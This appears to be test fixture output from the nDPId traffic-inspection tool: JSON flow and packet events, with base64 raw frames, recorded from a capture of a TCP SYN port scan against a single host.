-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsRG4AADsGyQSsEAAIQA2GNIzTPSzdU4MZAAAAAGACEADrXwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsZD8AADMGsTOsEAAIQA2GNIzTNrDdU4MZAAAAAGACEADx2wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsqbQAADoGZL6sEAAIQA2GNIzTJRzdU4MZAAAAAGACDAAHcAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUEAADIGoTGsEAAIQA2GNIzTAandU4MZAAAAAGACDAAq4wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAssN0AACoGbZWsEAAIQA2GNIzTF0fdU4MZAAAAAGACDAAVRQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmsAACwGbgesEAAIQA2GNIzSHUjdUoMYAAAAAGACBAAXRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs2\/QAADYGNn6sEAAIQA2GNIzSBC\/dUoMYAAAAAGACDAAoYAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsEvoAADIGA3msEAAIQA2GNIzSd\/7dUoMYAAAAAGACDAC0kAAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsK3gAADkG4\/qsEAAIQA2GNIzSAyjdUoMYAAAAAGACCAAtZwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsU\/gAACsGyXqsEAAIQA2GNIzSGY\/dUoMYAAAAAGACEAAPAAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsr1oAADIGZxisEAAIQA2GNIzSC\/\/dUoMYAAAAAGACDAAgkAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs4hsAACUGQVesEAAIQA2GNIzSE6ndUoMYAAAAAGACCAAc5gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsyIQAACkGVu6sEAAIQA2GNIzSBEfdUoMYAAAAAGACCAAsSAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsROwAADEG0oasEAAIQA2GNIzSBCjdUoMYAAAAAGACCAAsZwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsBKEAACYGHdKsEAAIQA2GNIzSBFfdUoMYAAAAAGACDAAoOAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsbn0AACgGsfWsEAAIQA2GNIzSIcndUoMYAAAAAGACBAASxgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAskbgAACwGirqsEAAIQA2GNIzSCDPdUoMYAAAAAGACBAAsXAAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsrooAADsGXuisEAAIQA2GNIzSAv3dUoMYAAAAAGACEAAlkgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"synscan.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs9kUAADAGIi2sEAAIQA2GNIzSIzLdUoMYAAAAAGACBAARXQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"synscan.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSYAADMG2EysEAAIQA2GNIzSI2\/dUoMYAAAAAGACEAAFIAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"synscan.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsda8AACkGqcOsEAAIQA2GNIzTwAPdU4MZAAAAAGACCABwiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"synscan.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsQxYAADYGz1ysEAAIQA2GNIzTCI7dU4MZAAAAAGACDAAj\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"synscan.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsrvQAADUGZH6sEAAIQA2GNIzTC7ndU4MZAAAAAGACCAAk0wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"synscan.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058405,"pkt":"ACYLMQczACWzv5HuCABFAAAsMq8AACsG6sOsEAAIQA2GNIzTGbTdU4MZAAAAAGACEAAO2AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058405,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
